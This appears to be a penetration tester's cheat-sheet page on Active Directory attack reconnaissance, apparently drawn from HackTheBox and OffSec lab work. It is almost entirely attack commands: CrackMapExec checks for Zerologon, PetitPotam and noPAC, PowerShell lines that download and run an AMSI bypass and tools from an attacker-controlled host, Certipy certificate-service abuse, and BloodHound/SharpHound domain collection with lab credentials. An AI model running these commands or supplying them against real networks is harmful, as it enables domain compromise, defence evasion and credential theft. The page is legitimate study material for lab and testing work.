AD Attack Recon

Enumeration Tools

CrackMapExec

# Zerologon
crackmapexec smb $RHOST -u '' -p '' -M zerologon

# PetitPotam
crackmapexec smb $RHOST -u '' -p '' -M petitpotam

# noPAC
crackmapexec smb $RHOST -u 'user' -p 'pass' -M nopa
# You need a credential for this one

adPEAS

# You need a credential to run adPEAS. 

# Bypass ASMI 
IEX (new-Object Net.WebClient).DownloadString('http://10.0.0.181/privesc/amsi.txt')
IEX (new-Object Net.WebClient).DownloadString('http://10.0.0.181/privesc/my-am-bypass.ps1')

# Import adPEAS
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.181/privesc/adPEAS.ps1')

# Run the adPEAS
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com' -Username 'contoso\johndoe' -Password 'Passw0rd1!' -Force

# gMSA account (service account such as svc_apache$) 
Invoke-adPEAS -Domain 'heist.offsec' -Server 'dc01.heist.offsec' -Username 'heist.offsec\enox' -Password 'california' -Force -Module Creds

Certipy

Certipy is an offensive tool for enumerating and abusing Active Directory Certificate Services (AD CS)

# Update Certipy
Kali> python3 -m venv venv
Kali> source venv/bin/activate.fish
Kali> pip3 install certipy-ad
Kali> venv/bin/certipy --version
Certipy v4.8.2 - by Oliver Lyak (ly4k) # as of 01/12/2024 

# Find ADCS related vulnerabilities

kali> venv/bin/certipy find -u Raven -p R4v3nBe5tD3veloP3r!123 -target manager.htb -text -stdout -vulnerable

# This will save it as Bloodhound data
Kali> venv/bin/certipy find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.133.85

# Go to the site and attack the ADCS. 
https://github.com/ly4k/Certipy

Bloodhound

Server side

sudo service neo4j start
sudo neo4j console
# will initiate the site, http://localhost:7474/ 
bloodhound &
# id: neo4j
# password: bloodhound (default password was neo4j)

Client side

# Kali 

# Ensure you configure DC FQDN name in host file such as dc01.blackfield.local 
cme ldap $RHOST -u library -p library --bloodhound -ns $RHOST -c all

bloodhound.py -u 'support' -p '#00^BlackKnight' -v --zip -c All -ns 10.129.157.228 -d blackfield.local -dc dc01.blackfield.local 

bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -ns 192.168.56.11  


# Kali with Kerberos authentication 
bloodhound.py -k -u m.lovegod -p AbsoluteLDAP2022! --auth-method kerberos -d absolute.htb -dc dc.absolute.htb -ns 10.129.228.64 --dns-tcp --zip -c All

# At Windows
cmd> .\SharpHound.exe --CollectionMethods All --ZipFileName output.zip
cmd> .\SharpHound.exe --domain THROWBACK.local --domaincontroller 10.200.74.117 --ldapusername "BlaireJ" --ldappassword "7eQgx6YzxgG3vC45t5k9" --CollectionMethods Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly

# With Powershell
cmd >powershell -ev bypass
ps>. .\SharpHound.ps1
ps> Invoke-BloodHound -CollectionMethod All -Domain Controller.local -zipFileName dc.zip

# Connect from a non domain joined system. DNS should be pointing to DC. 
cmd> runas /netonly /user:BORDERGATE\Alice cmd.exe
cmd> SharpHound.exe -d bordergate.local

Invoke-AdEnum

PS> IEX(IWR -UseBasicParsing https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1);Invoke-ADEnum

PowerUpSQL

PS> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Pyverview

https://github.com/the-useless-one/pywerview

PreviousAD Interesting file location NextBloodhound Walkthrough

Last updated 1 year ago